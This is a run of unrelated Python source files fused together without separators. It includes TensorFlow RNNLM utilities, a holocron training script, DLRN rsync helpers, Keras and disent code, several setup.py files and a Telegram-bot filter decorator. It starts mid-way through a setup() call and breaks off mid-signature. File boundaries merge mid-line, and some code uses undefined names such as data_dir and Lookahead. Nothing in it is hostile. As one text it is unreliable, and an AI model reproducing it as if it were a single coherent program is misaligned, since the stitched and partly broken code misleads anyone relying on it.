True, install_requires = ["requests", "click"], platforms = "any", scripts = [], entry_points = { 'console_scripts': [ 'pal-tsne=tsne.cli:main_cli' ] } )# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # Copyright (C) 2017 Intellisist, Inc. (Author: ) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Utilities for parsing RNNLM text files.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import os import tensorflow as tf def _read_words(filename): with tf.gfile.GFile(filename, "r") as f: return f.read().decode("utf-8").split() def _build_vocab(filename): words = _read_words(filename) word_to_id = dict(list(zip(words, list(range(len(words)))))) return word_to_id def _file_to_word_ids(filename, word_to_id): data = _read_words(filename) return [word_to_id[word] for word in data if word in word_to_id] def rnnlm_raw_data(data_path, vocab_path): """Load RNNLM raw data from data directory "data_path". Args: data_path: string path to the directory where train/valid files are stored Returns: tuple (train_data, valid_data, test_data, vocabulary) where each of the data objects can be passed to RNNLMIterator. """ train_path = os.path.join(data_path, "train") valid_path = os.path.join(data_path, "valid") word_to_id = _build_vocab(vocab_path) train_data = _file_to_word_ids(train_path, word_to_id) valid_data = _file_to_word_ids(valid_path, word_to_id) vocabulary = len(word_to_id) return train_data, valid_data, vocabulary, word_to_id def rnnlm_gen_data(*files): """Generates data and vocab from files. This function is used solely for testing. """ import collections import re all_words = collections.Counter() all_word_lists = [] for f in files: with open(f, mode="r") as fp: text = fp.read() word_list = re.split("[^A-Za-z]", text) word_list = list(filter(None, word_list)) all_words.update(word_list) all_word_lists.append(word_list) word_to_id = {word: i for i, (word, _) in enumerate(all_words.most_common())} def convert(word_list): return [word_to_id[word] for word in word_list] all_word_ids = [convert(word_list) for word_list in all_word_lists] return all_word_ids, word_to_id class RNNLMProducer(tf.Module): """This is the data feeder.""" def __init__(self, raw_data, batch_size, num_steps, name=None): super().__init__(name) self.batch_size = batch_size self.num_steps = num_steps self.epoch_size = (len(raw_data) - 1) // num_steps // batch_size # load data into a variable so that it will be separated from graph self._raw_data = tf.Variable(raw_data, dtype=tf.int32, trainable=False) ds_x = tf.data.Dataset.from_tensor_slices(self._raw_data) ds_y = ds_x.skip(1) ds = tf.data.Dataset.zip((ds_x, ds_y)) # form samples ds = ds.batch(num_steps, drop_remainder=True) # form batches self._ds = ds.batch(batch_size, drop_remainder=True) def iterate(self): return self._ds if __name__ == "__main__": samples = list(range(100)) ds = RNNLMProducer(samples, 4, 8) print(ds.epoch_size) for data in ds.iterate(): print(data) # Copyright (C) 2019-2021, . # This program is licensed under the Apache License version 2. # See LICENSE or go to for full license details. ''' Training script for image classification ''' import os import time import math import datetime import numpy as np import torch import torch.nn as nn from torch.utils.data import RandomSampler, SequentialSampler from torchvision.datasets import ImageFolder, CIFAR10, CIFAR100 from torchvision.transforms import transforms as T import holocron from holocron.trainer import ClassificationTrainer def worker_init_fn(worker_id: int) -> None: np.random.seed((worker_id + torch.initial_seed()) % np.iinfo(np.int32).max) def main(args): print(args) torch.backends.cudnn.benchmark = True # Data loading train_loader, val_loader = None, None normalize = T.Normalize( mean=[0.485, 0.456, 0.406] if args.dataset.lower() == "imagenette" else [0.5071, 0.4866, 0.4409], std=[0.229, 0.224, 0.225] if args.dataset.lower() == "imagenette" else [0.2673, 0.2564, 0.2761] ) if not args.test_only: st = time.time() if args.dataset.lower() == "imagenette": train_set = ImageFolder( os.path.join(args.data_path, 'train'), T.Compose([ T.RandomResizedCrop(args.img_size, scale=(0.3, 1.0)), T.RandomHorizontalFlip(), T.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.1, hue=0.02), T.ToTensor(), normalize, T.RandomErasing(p=0.9, value='random') ])) else: cifar_version = CIFAR100 if args.dataset.lower() == "cifar100" else CIFAR10 train_set = cifar_version( data_dir, True, T.Compose([ T.RandomHorizontalFlip(), T.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.1, hue=0.02), T.ToTensor(), normalize, T.RandomErasing(p=0.9, value='random') ])) train_loader = torch.utils.data.DataLoader( train_set, batch_size=args.batch_size, drop_last=True, sampler=RandomSampler(train_set), num_workers=args.workers, pin_memory=True, worker_init_fn=worker_init_fn) print(f"Training set loaded in {time.time() - st:.2f}s " f"({len(train_set)} samples in {len(train_loader)} batches)") if not (args.lr_finder or args.check_setup): st = time.time() if args.dataset.lower() == "imagenette": eval_tf = [] crop_pct = 0.875 scale_size = min(int(math.floor(args.img_size / crop_pct)), 320) if scale_size < 320: eval_tf.append(T.Resize(scale_size)) eval_tf.extend([T.CenterCrop(args.img_size), T.ToTensor(), normalize]) val_set = ImageFolder( os.path.join(args.data_path, 'val'), T.Compose(eval_tf) ) else: val_set = CIFAR100(data_dir, False, T.Compose([T.ToTensor(), normalize])) val_loader = torch.utils.data.DataLoader( val_set, batch_size=args.batch_size, drop_last=False, sampler=SequentialSampler(val_set), num_workers=args.workers, pin_memory=True, worker_init_fn=worker_init_fn) print(f"Validation set loaded in {time.time() - st:.2f}s ({len(val_set)} samples in {len(val_loader)} batches)") model = holocron.models.__dict__[args.model](args.pretrained, num_classes=len(train_set.classes)) if args.loss == 'crossentropy': criterion = nn.CrossEntropyLoss() elif args.loss == 'label_smoothing': criterion = holocron.nn.LabelSmoothingCrossEntropy() # Create the contiguous parameters. model_params = [p for p in model.parameters() if p.requires_grad] if args.opt == 'sgd': optimizer = torch.optim.SGD(model_params, args.lr, momentum=0.9, weight_decay=args.weight_decay) elif args.opt == 'adam': optimizer = torch.optim.Adam(model_params, args.lr, betas=(0.95, 0.99), eps=1e-6, weight_decay=args.weight_decay) elif args.opt == 'radam': optimizer = holocron.optim.RAdam(model_params, args.lr, betas=(0.95, 0.99), eps=1e-6, weight_decay=args.weight_decay) elif args.opt == 'ranger': optimizer = Lookahead(holocron.optim.RAdam(model_params, args.lr, betas=(0.95, 0.99), eps=1e-6, weight_decay=args.weight_decay)) elif args.opt == 'tadam': optimizer = holocron.optim.TAdam(model_params, args.lr, betas=(0.95, 0.99), eps=1e-6, weight_decay=args.weight_decay) trainer = ClassificationTrainer(model, train_loader, val_loader, criterion, optimizer, args.device, args.output_file) if args.resume: print(f"Resuming {args.resume}") checkpoint = torch.load(args.resume, map_location='cpu') trainer.load(checkpoint) if args.test_only: print("Running evaluation") eval_metrics = trainer.evaluate() print(f"Validation loss: {eval_metrics['val_loss']:.4} " f"(Acc@1: {eval_metrics['acc1']:.2%}, Acc@5: {eval_metrics['acc5']:.2%})") return if args.lr_finder: print("Looking for optimal LR") trainer.lr_find(args.freeze_until, num_it=min(len(train_loader), 100)) trainer.plot_recorder() return if args.check_setup: print("Checking batch overfitting") is_ok = trainer.check_setup(args.freeze_until, args.lr, num_it=min(len(train_loader), 100)) print(is_ok) return print("Start training") start_time = time.time() trainer.fit_n_epochs(args.epochs, args.lr, args.freeze_until, args.sched) total_time_str = str(datetime.timedelta(seconds=int(time.time() - start_time))) print(f"Training time {total_time_str}") def parse_args(): import argparse parser = argparse.ArgumentParser(description='Holocron Classification Training', formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('data_path', type=str, help='path to dataset folder') parser.add_argument('--model', default='darknet19', type=str, help='model') parser.add_argument('--dataset', default='imagenette', type=str, help='dataset to train on') parser.add_argument('--freeze-until', default=None, type=str, help='Last layer to freeze') parser.add_argument('--device', default=None, type=int, help='device') parser.add_argument('-b', '--batch-size', default=32, type=int, help='batch size') parser.add_argument('--epochs', default=20, type=int, help='number of total epochs to run') parser.add_argument('-j', '--workers', default=min(os.cpu_count(), 16), type=int, help='number of data loading workers') parser.add_argument('--img-size', default=224, type=int, help='image size') parser.add_argument('--loss', default='crossentropy', type=str, help='loss') parser.add_argument('--opt', default='adam', type=str, help='optimizer') parser.add_argument('--sched', default='onecycle', type=str, help='Scheduler to be used') parser.add_argument('--lr', default=1e-3, type=float, help='initial learning rate') parser.add_argument('--wd', '--weight-decay', default=0, type=float, help='weight decay', dest='weight_decay') parser.add_argument("--lr-finder", dest='lr_finder', action='store_true', help="Should you run LR Finder") parser.add_argument("--check-setup", dest='check_setup', action='store_true', help="Check your training setup") parser.add_argument('--output-file', default='./model.pth', help='path where to save') parser.add_argument('--resume', default='', help='resume from checkpoint') parser.add_argument("--test-only", dest="test_only", help="Only test the model", action="store_true") parser.add_argument("--pretrained", dest="pretrained", help="Use pre-trained models from the modelzoo", action="store_true") args = parser.parse_args() return args if __name__ == "__main__": args = parse_args() main(args) def extractHugsAndLove(item): vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title']) if not (chp or vol or frag) or 'preview' in item['title'].lower(): return None if not postfix and ':' in item['title']: postfix = item['title'].split(':', 1)[-1] if 'Felicia Second Life' in item['tags']: return buildReleaseMessageWithType(item, 'Felicia Second Life', vol, chp, frag=frag, postfix=postfix, tl_type='oel') if 'the rock' in item['tags']: return buildReleaseMessageWithType(item, 'The Rock', vol, chp, frag=frag, postfix=postfix, tl_type='oel') if item['title'].startswith('Armageddon'): return buildReleaseMessageWithType(item, 'Armageddon', vol, chp, frag=frag, postfix=postfix, tl_type='oel') return False # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging import os import sh from dlrn.config import getConfigOptions logger = logging.getLogger("dlrn-rsync") def sync_repo(commit): config_options = getConfigOptions() rsyncdest = config_options.rsyncdest rsyncport = config_options.rsyncport datadir = os.path.realpath(config_options.datadir) if rsyncdest != '': # We are only rsyncing the current repo dir to rsyncdest rsyncpaths = [] # We are inserting a dot in the path after repos, this is used by # rsync -R (see man rsync) commitdir_abs = os.path.join(datadir, "repos", ".", commit.getshardedcommitdir()) rsyncpaths.append(commitdir_abs) # We also need report.html, status_report.html, queue.html, # styles.css and the consistent and current symlinks for filename in ['report.html', 'status_report.html', 'styles.css', 'queue.html', 'status_report.csv']: filepath = os.path.join(datadir, "repos", ".", filename) rsyncpaths.append(filepath) rsh_command = 'ssh -p %s -o StrictHostKeyChecking=no' % rsyncport try: sh.rsync('-avzR', '--delete-delay', '-e', rsh_command, rsyncpaths, rsyncdest) except Exception as e: logger.warn('Failed to rsync content to %s ,' 'got error %s' % (rsyncdest, e)) # Raise exception, so it can be treated as an error raise e def sync_symlinks(commit): config_options = getConfigOptions() rsyncdest = config_options.rsyncdest rsyncport = config_options.rsyncport datadir = os.path.realpath(config_options.datadir) if rsyncdest != '': # We want to sync the symlinks in a second pass, once all content # has been copied, to avoid a race condition it they are copied first rsyncpaths = [] for filename in ['consistent', 'current']: filepath = os.path.join(datadir, "repos", ".", filename) rsyncpaths.append(filepath) rsh_command = 'ssh -p %s -o StrictHostKeyChecking=no' % rsyncport try: sh.rsync('-avzR', '--delete-delay', '-e', rsh_command, rsyncpaths, rsyncdest) except Exception as e: # We are not raising exceptions for symlink rsyncs, these will # be fixed after another build logger.warn('Failed to rsync symlinks to %s ,' 'got error %s' % (rsyncdest, e)) n=1 suma=0 while (n<61): if (n==n): n=n+5 suma=suma+n print(n) print("n12="+str(n)) print("suma="+str(suma))""" Value is not in collection conditions """ from marshmallow import post_load from .base import CollectionCondition, CollectionConditionSchema class IsNotIn(CollectionCondition): """ Condition for `what` is not a member of `values` """ def is_satisfied(self, ctx) -> bool: return self._is_satisfied(ctx.attribute_value) def _is_satisfied(self, what) -> bool: return what not in self.values class IsNotInSchema(CollectionConditionSchema): """ JSON schema for is not in collection condition """ @post_load def post_load(self, data, **_): # pylint: disable=missing-docstring,no-self-use return IsNotIn(**data) 0 from keras.models import Sequential from keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, Dense, BatchNormalization def model2(input_shape): model = Sequential() model.add(Conv2D(32,kernel_size=3,activation='relu',input_shape=input_shape)) model.add(BatchNormalization()) model.add(Conv2D(32,kernel_size=3,activation='relu')) model.add(BatchNormalization()) model.add(Conv2D(32,kernel_size=5,strides=2,padding='same',activation='relu')) model.add(BatchNormalization()) model.add(Dropout(0.4)) model.add(Conv2D(64,kernel_size=3,activation='relu')) model.add(BatchNormalization()) model.add(Conv2D(64,kernel_size=3,activation='relu')) model.add(BatchNormalization()) model.add(Conv2D(64,kernel_size=5,strides=2,padding='same',activation='relu')) model.add(BatchNormalization()) model.add(Dropout(0.4)) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(BatchNormalization()) model.add(Dropout(0.4)) model.add(Dense(10, activation='softmax')) return model # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ # MIT License # # Copyright (c) 2021 # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ import logging import numpy as np import torch from disent.util import to_numpy from disent.visualize import visualize_util from disent.visualize.visualize_util import make_animated_image_grid from disent.visualize.visualize_util import reconstructions_to_images log = logging.getLogger(__name__) # ========================================================================= # # Visualise Latent Cycle - Modes # # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ # # Copyright 2018 The DisentanglementLib Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 # # https://github.com/google-research/disentanglement_lib # # Copyright applies to this subsection only. # # ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ # # CHANGES: # # - extracted from original code # # - was not split into functions in this was # # ========================================================================= # def _z_std_gaussian_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle through quantiles of a standard Gaussian. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) zs[:, z_idx] = visualize_util.cycle_gaussian(base_z[z_idx], num_frames, loc=0, scale=1) return zs def _z_fitted_gaussian_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle through quantiles of a fitted Gaussian. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) loc = np.mean(z_means[:, z_idx]) total_variance = np.mean(np.exp(z_logvars[:, z_idx])) + np.var(z_means[:, z_idx]) zs[:, z_idx] = visualize_util.cycle_gaussian(base_z[z_idx], num_frames, loc=loc, scale=np.sqrt(total_variance)) return zs def _z_fixed_interval_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle through [-2, 2] interval. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) zs[:, z_idx] = visualize_util.cycle_interval(base_z[z_idx], num_frames, -2., 2.) return zs def _z_conf_interval_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle linearly through +-2 std dev of a fitted Gaussian. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) loc = np.mean(z_means[:, z_idx]) total_variance = np.mean(np.exp(z_logvars[:, z_idx])) + np.var(z_means[:, z_idx]) scale = np.sqrt(total_variance) zs[:, z_idx] = visualize_util.cycle_interval(base_z[z_idx], num_frames, loc - 2. * scale, loc + 2. * scale) return zs def _z_minmax_interval_cycle(base_z, z_means, z_logvars, z_idx, num_frames): # Cycle linearly through minmax of a fitted Gaussian. zs = np.repeat(np.expand_dims(base_z, 0), num_frames, axis=0) zs[:, z_idx] = visualize_util.cycle_interval(base_z[z_idx], num_frames, np.min(z_means[:, z_idx]), np.max(z_means[:, z_idx])) return zs _LATENT_CYCLE_MODES_MAP = { 'std_gaussian_cycle': _z_std_gaussian_cycle, 'fitted_gaussian_cycle': _z_fitted_gaussian_cycle, 'fixed_interval_cycle': _z_fixed_interval_cycle, 'conf_interval_cycle': _z_conf_interval_cycle, 'minmax_interval_cycle': _z_minmax_interval_cycle, } # ========================================================================= # # Visualise Latent Cycles # # ========================================================================= # def latent_cycle(decoder_func, z_means, z_logvars, mode='fixed_interval_cycle', num_animations=4, num_frames=20, decoder_device=None): assert len(z_means) > 1 and len(z_logvars) > 1, 'not enough samples to average' # convert z_means, z_logvars = to_numpy(z_means), to_numpy(z_logvars) # get mode if mode not in _LATENT_CYCLE_MODES_MAP: raise KeyError(f'Unsupported mode: {repr(mode)} not in {set(_LATENT_CYCLE_MODES_MAP)}') z_gen_func = _LATENT_CYCLE_MODES_MAP[mode] animations = [] for i, base_z in enumerate(z_means[:num_animations]): frames = [] for j in range(z_means.shape[1]): z = z_gen_func(base_z, z_means, z_logvars, j, num_frames) z = torch.as_tensor(z, device=decoder_device) frames.append(reconstructions_to_images(decoder_func(z))) animations.append(frames) return to_numpy(animations) def latent_cycle_grid_animation(decoder_func, z_means, z_logvars, mode='fixed_interval_cycle', num_frames=21, pad=4, border=True, bg_color=0.5, decoder_device=None, tensor_style_channels=True, always_rgb=True, return_stills=False, to_uint8=False): # produce latent cycle animation & merge frames stills = latent_cycle(decoder_func, z_means, z_logvars, mode=mode, num_animations=1, num_frames=num_frames, decoder_device=decoder_device)[0] # check and add missing channel if needed (convert greyscale to rgb images) if always_rgb: assert stills.shape[-1] in {1, 3}, f'Invalid number of image channels: {stills.shape} ({stills.shape[-1]})' if stills.shape[-1] == 1: stills = np.repeat(stills, 3, axis=-1) # create animation frames = make_animated_image_grid(stills, pad=pad, border=border, bg_color=bg_color) # move channels to end if tensor_style_channels: if return_stills: stills = np.transpose(stills, [0, 1, 4, 2, 3]) frames = np.transpose(frames, [0, 3, 1, 2]) # convert to uint8 if to_uint8: if return_stills: stills = np.clip(stills*255, 0, 255).astype('uint8') frames = np.clip(frames*255, 0, 255).astype('uint8') # done! if return_stills: return frames, stills return frames # ========================================================================= # # END # # ========================================================================= # 0 #rename file to config.py token = "YOUR TOKEN HERE"from customs.strategies.base_strategy import BaseStrategy def concreter(abclass): """ >>> import abc >>> class Abstract(metaclass=abc.ABCMeta): ... @abc.abstractmethod ... def bar(self): ... return None >>> c = concreter(Abstract) >>> c.__name__ 'dummy_concrete_Abstract' >>> c().bar() # doctest: +ELLIPSIS (, (), {}) """ if "__abstractmethods__" not in abclass.__dict__: return abclass new_dict = abclass.__dict__.copy() for abstractmethod in abclass.__abstractmethods__: # replace each abc method or property with an identity function: new_dict[abstractmethod] = lambda x, *args, **kw: (x, args, kw) # creates a new class, with the overriden ABCs: return type("dummy_concrete_%s" % abclass.__name__, (abclass,), new_dict) def test_base_strategy(): concreter(BaseStrategy) # This problem was asked by . # cons(a, b) constructs a pair, and car(pair) and cdr(pair) returns the first and # last element of that pair. For example, car(cons(3, 4)) returns 3, and # cdr(cons(3, 4)) returns 4. # Given this implementation of cons: # def cons(a, b): # return lambda f : f(a, b) # Implement car and cdr. #### def cons(a, b): return lambda f : f(a, b) #### def car(f): return f(lambda x, y: x) def cdr(f): return f(lambda x, y: y) #### tmp = cons(1, 2) a = cons(3, tmp) print(car(a)) print(car(cdr(a))) print(cdr(cdr(a))) paperai/report/__main__.py0 """ Defines main entry point for Report process. """ import sys from .execute import Execute if __name__ == "__main__": if len(sys.argv) > 1: # Run report with params: input file, topn, render # format, embeddings model path, qa model path, threshold Execute.run( sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else None, sys.argv[3] if len(sys.argv) > 3 else None, sys.argv[4] if len(sys.argv) > 4 else None, sys.argv[5] if len(sys.argv) > 5 else None, sys.argv[6] if len(sys.argv) > 6 else None, int(sys.argv[7]) if len(sys.argv) > 7 else None, ) """ setup.py file for building armstrong components. Nothing in this file should need to be edited, please see accompanying package.json file if you need to adjust metadata about this package. """ from distutils.core import setup import json import os info = json.load(open("./package.json")) def convert_to_str(d): """ Recursively convert all values in a dictionary to strings This is required because setup() does not like unicode in the values it is supplied. """ d2 = {} for k, v in d.items(): k = str(k) if type(v) in [list, tuple]: d2[k] = [str(a) for a in v] elif type(v) is dict: d2[k] = convert_to_str(v) else: d2[k] = str(v) return d2 info = convert_to_str(info) NAMESPACE_PACKAGES = [] # TODO: simplify this process def generate_namespaces(package): new_package = ".".join(package.split(".")[0:-1]) if new_package.count(".") > 0: generate_namespaces(new_package) NAMESPACE_PACKAGES.append(new_package) generate_namespaces(info["name"]) if os.path.exists("MANIFEST"): os.unlink("MANIFEST") # Borrowed and modified from django-registration # Compile the list of packages available, because distutils doesn't have # an easy way to do this. packages, data_files = [], [] root_dir = os.path.dirname(__file__) if root_dir: os.chdir(root_dir) def build_package(dirpath, dirnames, filenames): # Ignore dirnames that start with '.' for i, dirname in enumerate(dirnames): if dirname.startswith('.'): del dirnames[i] if '__init__.py' in filenames and 'steps.py' not in filenames: pkg = dirpath.replace(os.path.sep, '.') if os.path.altsep: pkg = pkg.replace(os.path.altsep, '.') packages.append(pkg) elif filenames: # Strip off the length of the package name plus the trailing slash prefix = dirpath[len(info["name"]) + 1:] for f in filenames: # Ignore all dot files and any compiled if f.startswith(".") or f.endswith(".pyc"): continue data_files.append(os.path.join(prefix, f)) [build_package(dirpath, dirnames, filenames) for dirpath, dirnames, filenames in os.walk(info["name"].replace(".", "/"))] setup_kwargs = { "author": "Bay Citizen & Texas Tribune", "author_email": "", "url": "http://github.com/armstrong/%s/" % info["name"], "packages": packages, "package_data": {info["name"]: data_files, }, "namespace_packages": NAMESPACE_PACKAGES, "classifiers": [ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python', ], } setup_kwargs.update(info) setup(**setup_kwargs) #!/usr/bin/env python from distutils.core import setup setup( name='progeny', version='1.0', description='PROGENy is a python package to compute pathway activity from RNA-seq data', author='', url='https://github.com/saezlab/progeny-py', packages=['progeny'], license='LICENSE.txt', package_data={'progeny': ['data/model_human_full.pkl', 'data/model_mouse_full.pkl']}, install_requires=[ 'anndata', 'scanpy', 'numpy'] )from __future__ import annotations from typing import List, Dict, Any from ecstremity.entity import Entity from ecstremity.prefab_component import PrefabComponent class Prefab: def __init__( self, name: str, inherit: List[Prefab] = None, components: List[PrefabComponent] = None ) -> None: self.name = name self.inherit = inherit if inherit else [] self.components = components if components else [] def __str__(self): return f"{self.name} {[component.cls for component in self.components]}" def add_component(self, component: PrefabComponent): self.components.append(component) def apply_to_entity(self, entity: Entity, prefab_props: Dict[int, Any] = None) -> Entity: if not prefab_props: prefab_props = {} prefab_props = {k.upper(): v for k, v in prefab_props.items()} for parent in self.inherit: parent.apply_to_entity(entity, prefab_props) arr_comps = {} for component in self.components: klass = component.klass comp_id = klass.comp_id initial_comp_props = {} if klass.allow_multiple: if not arr_comps.get(comp_id): arr_comps[comp_id] = 0 if prefab_props.get(comp_id): if prefab_props[comp_id].get(arr_comps[comp_id]): initial_comp_props = prefab_props[comp_id][arr_comps[comp_id]] arr_comps[comp_id] += 1 else: initial_comp_props = prefab_props.get(comp_id) component.apply_to_entity(entity, initial_comp_props) return entity # next is to add accel and see the difference # add stiffness too import numpy as np from scipy import signal, stats from matplotlib import pyplot as plt from all_functions import * import pickle from warnings import simplefilter simplefilter(action='ignore', category=FutureWarning) experiment_ID = "transfer_learning_6" errors_all_A_A = np.load("./results/{}/errors_all_A_A.npy".format(experiment_ID)) errors_all_A_B = np.load("./results/{}/errors_all_A_B.npy".format(experiment_ID)) errors_all_B_B = np.load("./results/{}/errors_all_B_B.npy".format(experiment_ID)) ## printing the results print("errors_mean: ",errors_all_A_A.mean(2)) print("errors_std: ",errors_all_A_A.std(2)) print("errors_mean: ",errors_all_A_B.mean(2)) print("errors_std: ",errors_all_A_B.std(2)) print("errors_mean: ",errors_all_B_B.mean(2)) print("errors_std: ",errors_all_B_B.std(2)) [f_ow, p_val_avg] = stats.f_oneway(errors_all_A_A.mean(0)[0],errors_all_A_B.mean(0)[0]) print("p-value (babbling/average/A_A vs A_B): ", p_val_avg) [f_ow, p_val_avg] = stats.f_oneway(errors_all_A_A.mean(0)[1],errors_all_A_B.mean(0)[1]) print("p-value (refined/average/A_A vs A_B): ", p_val_avg) [f_ow, p_val_avg] = stats.f_oneway(errors_all_A_A.mean(0)[1],errors_all_B_B.mean(0)[1]) print("p-value (refined/average/A_A vs B_B): ", p_val_avg) # [f_ow, p_val_q0] = stats.f_oneway(errors_all_A_A[0,:],errors_all_A_B[0,:]) # print("p-value (q0): ", p_val_q0) # [f_ow, p_val_q1] = stats.f_oneway(errors_all_A_A[1,:],errors_all_A_B[1,:]) # print("p-value (q1): ", p_val_q1) y_lim=[0, 0.9] fig, axes = plt.subplots(nrows=2, ncols=3, figsize=(12, 5)) p0 = axes[0][0].boxplot( [errors_all_A_A.mean(0)[0], errors_all_A_B.mean(0)[0], errors_all_B_B.mean(0)[0]], notch=True, patch_artist=True) axes[0][0].set_title(r'$(q_0+q_1)/2$',fontsize=12) axes[0][0].set_ylim(y_lim) #axes[0].set_xlabel('stiffness') axes[0][0].set_xticklabels(["A_A", "A_B", "B_B"], rotation=45, fontsize=8) axes[0][0].set_ylabel('RMSE') p1 = axes[0][1].boxplot( [errors_all_A_A[0,0,:], errors_all_A_B[0,0,:], errors_all_B_B[0,0,:]], notch=True, patch_artist=True) axes[0][1].set_title('$q_0$', fontsize=12) axes[0][1].set_ylim(y_lim) axes[0][1].set_yticklabels([]) #axes[1].set_xlabel('stiffness') axes[0][1].set_xticklabels(["A_A", "A_B", "B_B"], rotation=45, fontsize=8) p2 = axes[0][2].boxplot( [errors_all_A_A[1,0,:], errors_all_A_B[1,0,:], errors_all_B_B[1,0,:]], notch=True, patch_artist=True) axes[0][2].set_title('$q_1$', fontsize=12) axes[0][2].set_ylim(y_lim) axes[0][2].set_yticklabels([]) #axes[2].set_xlabel('stiffness') axes[0][2].set_xticklabels(["A_A", "A_B", "B_B"], rotation=45, fontsize=8) p3 = axes[1][0].boxplot( [errors_all_A_A.mean(0)[-1], errors_all_A_B.mean(0)[-1], errors_all_B_B.mean(0)[-1]], notch=True, patch_artist=True) #axes[1][0].set_title(r'$(q_0+q_1)/2$',fontsize=12) axes[1][0].set_ylim(y_lim) #axes[0].set_xlabel('stiffness') axes[1][0].set_xticklabels(["A_A", "A_B", "B_B"], rotation=45, fontsize=8) axes[1][0].set_ylabel('RMSE') p4 = axes[1][1].boxplot( [errors_all_A_A[0,-1,:], errors_all_A_B[0,-1,:], errors_all_B_B[0,-1,:]], notch=True, patch_artist=True) #axes[1][1].set_title('$q_0$', fontsize=12) axes[1][1].set_ylim(y_lim) axes[1][1].set_yticklabels([]) #axes[1].set_xlabel('stiffness') axes[1][1].set_xticklabels(["A_A","A_B", "B_B"], rotation=45, fontsize=8) p5 = axes[1][2].boxplot( [errors_all_A_A[1,-1,:], errors_all_A_B[1,-1,:], errors_all_B_B[1,-1,:]], notch=True, patch_artist=True) #axes[1][2].set_title('$q_1$', fontsize=12) axes[1][2].set_ylim(y_lim) axes[1][2].set_yticklabels([]) #axes[2].set_xlabel('stiffness') axes[1][2].set_xticklabels(["A_A","A_B","B_B"], rotation=45, fontsize=8) for i_row in range(2): for j_col in range(3): axes[i_row][j_col].grid(True) plt.show() #import pdb; pdb.set_trace() WyckliffeAluga/data-chronicles # -*- coding: utf-8 -*- """ Created on Sat May 9 19:52:11 2020 @author: wyckliffe """ from sklearn.preprocessing import MinMaxScaler from keras.models import load_model import numpy as np def predict(Gender, Age, Salary, Debt, Net): if Gender == "M" or Gender == "m" : Gender = 1 else: Gender = 0 inputs = np.asarray([Gender, Age, Salary, Debt, Net]).reshape(-1,1) scaler = MinMaxScaler() inputs = scaler.fit_transform(inputs) inputs = inputs.T model = load_model("model.h5") predictions = model.predict(inputs) prediction = scaler.inverse_transform(predictions) amount = prediction[0][0] return '${:,.2f}'.format(amount) # pylint: disable=missing-module-docstring # # Copyright (C) 2020 by UsergeTeam@Github, < https://github.com/UsergeTeam >. # # This file is part of < https://github.com/UsergeTeam/Userge > project, # and is released under the "GNU v3.0 License Agreement". # Please see < https://github.com/uaudith/Userge/blob/master/LICENSE > # # All rights reserved. __all__ = ['OnFilters'] from pyrogram.filters import Filter as RawFilter from ... import types from . import RawDecorator class OnFilters(RawDecorator): # pylint: disable=missing-class-docstring def on_filters(self, # pylint: disable=arguments-differ filters: RawFilter, group: int = 0, allow_private: bool = True, allow_bots: bool = True, allow_groups: bool = True, allow_channels: bool = True, only_admins: bool = False, allow_via_bot: bool = True, check_client: bool = True, check_downpath: bool = False, check_change_info_perm: bool = False, check_edit_perm: bool = False, 